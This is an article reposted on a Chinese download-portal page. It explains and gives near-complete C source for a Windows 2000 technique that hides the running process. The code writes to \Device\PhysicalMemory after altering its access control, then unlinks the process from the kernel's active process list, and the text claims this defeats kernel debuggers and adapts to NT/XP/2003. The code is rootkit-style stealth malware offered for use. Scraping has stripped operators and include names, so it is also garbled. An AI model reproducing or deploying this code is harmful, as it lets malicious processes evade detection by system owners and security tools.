首页
酷软
系统
游戏
媒体
- 电影
- 剧集
- 动画
- 记录
- 综艺
- MV
- 有声世界
云资源
源码
更多
- 文库
- web
- 站长帮
- 玩电脑
- 玩游戏
- 玩手机
- 涨姿势
- 玩软件
- 云图志
- 看漫画
- 微读书
- PS玩家
- 网文网语
- 硬件数码
- 编程开发
- 神秘之旅
- 福利线报
- 商业资源
- 网赚相关
- 健康加油站
赞助专区
云盘专区
资源阁
缘聚岛

[玩电脑]Win2000下进程隐藏的一种方案

作者：CC下载站日期：2018-04-07 07:55:17 浏览：2935 分类：玩电脑

十分抱歉，匆匆写了几句代码有点bug，即“ZwOpenSection(g_hMPM,SECTION_MAP_WRITE|SECTION_MAP_WRITE,attributes)”使得第一次运行返回失败，请删除原文，改正为：

pjf ([email protected])

上次在CVC提到了这东西，因为很简单觉得没必要多说什么，但有人要求写全，所以补充几句：

很多帖子对此论题作了分析，比如APIHOOK、系统服务HOOK等等，至于远线程注入没有自己的进程，本不算“隐藏”。

这里写一个2000下的完全隐藏方法，很简单，也没什么新意。

在讲解之前，首先提一提一些结构，进程执行体块中有数个进程相关链，其中之一是活动进程链。此链的重要
作用之一就是在查询系统信息时供遍历当前活动进程，很有意思的是M$可能因效率因素使它被排除出进程核心块，
意味进线程切换等操作时并不利用它，进一步说改写它也不该有不可忽视的问题（此即本方案的基础）。

怎么做很明显了，在活动进程双向链中删除想要得隐藏的进程既可，核心调试器（如softice/proc）亦查不出来。

2000下的隐藏当前进程的代码如下：

#include
#include
#include

#define NT_SUCCESS(Status)((NTSTATUS)(Status) = 0)
#define STATUS_INFO_LENGTH_MISMATCH((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONGNTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
NTSTATUSStatus;
ULONGInformation;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
USHORTLength;
USHORTMaximumLength;
PWSTRBuffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE0x00000040L
#define OBJ_OPENIF0x00000080L
#define OBJ_OPENLINK0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
ULONGLength;
HANDLERootDirectory;
PUNICODE_STRING ObjectName;
ULONGAttributes;
PVOIDSecurityDescriptor;
PVOIDSecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLESectionHandle,
INACCESS_MASKDesiredAccess,
INPOBJECT_ATTRIBUTESObjectAttributes
);

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRINGDestinationString,
IN PCWSTRSourceString
);

RTLINITUNICODESTRINGRtlInitUnicodeString;
ZWOPENSECTIONZwOpenSection;
HMODULEg_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;

BOOL InitNTDLL()
{
g_hNtDLL = LoadLibrary( "ntdll.dll" );
if ( !g_hNtDLL )
{
return FALSE;
}

RtlInitUnicodeString =
(RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");

ZwOpenSection =
(ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

return TRUE;
}

VOID CloseNTDLL()
{
if(g_hNtDLL != NULL)
{
FreeLibrary(g_hNtDLL);
}
}

VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{

PACL pDacl=NULL;
PACL pNewDacl=NULL;
PSECURITY_DESCRIPTOR pSD=NULL;
DWORD dwRes;
EXPLICIT_ACCESS ea;

if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
NULL,NULL,pDacl,NULL,pSD)!=ERROR_SUCCESS)
{
goto CleanUp;
}

ZeroMemory(ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";

if(dwRes=SetEntriesInAcl(1,ea,pDacl,pNewDacl)!=ERROR_SUCCESS)
{
goto CleanUp;
}

if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
{
goto CleanUp;
}

CleanUp:

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}

HANDLE OpenPhysicalMemory()
{
NTSTATUSstatus;
UNICODE_STRINGphysmemString;
OBJECT_ATTRIBUTESattributes;

RtlInitUnicodeString( physmemString, L"\Device\PhysicalMemory" );

attributes.Length= sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory= NULL;
attributes.ObjectName= physmemString;
attributes.Attributes= 0;
attributes.SecurityDescriptor= NULL;
attributes.SecurityQualityOfService= NULL;

status = ZwOpenSection(g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,attributes);

if(status == STATUS_ACCESS_DENIED){
status = ZwOpenSection(g_hMPM,READ_CONTROL|WRITE_DAC,attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,attributes);
}

if( !NT_SUCCESS( status ))
{
return NULL;
}

g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4,
0,
0x30000,
0x1000);
if( g_pMapPhysicalMemory == NULL )
{
return NULL;
}

return g_hMPM;
}

PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
PGDE=BaseAddress[VAddr22];
if ((PGDE1)!=0)
{
ULONG tmp=PGDE0x00000080;
if (tmp!=0)
{
PAddr=(PGDE0xFFC00000)+(VAddr0x003FFFFF);
}
else
{
PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE 0xfffff000, 0x1000);
PTE=((PULONG)PGDE)[(VAddr0x003FF000)12];
if ((PTE1)!=0)
{
PAddr=(PTE0xFFFFF000)+(VAddr0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
else return 0;
}
}
else return 0;

return (PVOID)PAddr;
}

ULONG GetData(PVOID addr)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys 0xfffff000, 0x1000);
if (tmp==0)
return 0;
ULONG ret=tmp[(phys 0xFFF)2];
UnmapViewOfFile(tmp);
return ret;
}

BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys 0xfffff000, 0x1000);
if (tmp==0)
return FALSE;
tmp[(phys 0xFFF)2]=data;
UnmapViewOfFile(tmp);
return TRUE;
}

BOOL HideProcessAtAll()
{
if (InitNTDLL())
{
if (OpenPhysicalMemory()==0)
{
return FALSE;
}
ULONG thread=GetData((PVOID)0xFFDFF124);
ULONG process=GetData(PVOID(thread+0x22c));
ULONG fw=GetData(PVOID(process+0xa0)),bw=GetData(PVOID(process+0xa4));
SetData(PVOID(fw+4),bw);
SetData(PVOID(bw),fw);
UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
}
return TRUE;
}

调用HideProcessAtAll即隐藏当前进程，如若一运行就隐藏，会修改到进程活动链表头，运行一段时间后可能出现些小问题，怎么解决，留作“课后习题”了^_^

注意默认物理地址0x30000为一页目录，在大多数情况时这样，但是是有例外的！怎么解决亦留作“...”吧，不多废话了。

稍微改一下偏移可移植于NT/XP/2003。